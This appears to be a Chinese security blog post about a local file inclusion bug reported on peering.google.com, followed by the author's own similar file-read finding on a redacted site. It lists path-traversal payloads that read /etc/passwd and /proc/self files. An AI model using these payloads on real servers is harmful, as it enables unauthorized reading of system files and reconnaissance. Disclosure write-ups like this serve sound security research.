k同学这次是引用【peering.google.com中的本地文件包含】漏洞案例来分享,这是我在国外博客上看到的,正如标题所说"你tm是怎么想到在url图片后加cat的?"
1.攻击者获得有关服务器和内核数据的信息。
PoC:“/proc/version”或“/proc/cpuinfo”或“proc/meminfo”)
2.攻击者获取有关服务器上文件的信息。
PoC:“/proc/self/cmdline”)
3.攻击者获取有关内部网络的信息。
PoC:”/proc/self/cmdline“)
4.攻击者获得有关操作及其在服务器上运行时间的信息。
PoC:”proc/self/stat“)
5.攻击者获得有关操作过程和系统能力的敏感信息,这些信息可以很好地衡量拒绝服务攻击的规模。
PoC:“/proc/self/status”)
https://peering.google.com/static/images/couch-ipad.png
在链接末尾添加以下值之一:
cat ../../../../../../../etc/passwd
cat ../../. ./../../../../proc/self/cmdline
cat ../../../../../../../proc/self/stat/
cat ../../../../../../../proc /self/status
通过这种方式:
https://peering.google.com/static/images/couch-ipad.png cat ../../../../../../../proc/self/cmdline
附漏洞作者的视频:
【分割线】
这让我想起了我几年前在t00ls发过的一个文件包含漏洞
头像地址:http://www.******.com/*********8?owner=1&person=1556935&defaultimg=/jsp/person/p_images/person-jlzx.gif
看到defaultimg参数就直觉告诉我能进行文件读取,于是换成根目录index.jsp,发现没任何反应....
于是把前面的person参数值前面加个负号.....果然内容出来了
接着/etc/passwd
over
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论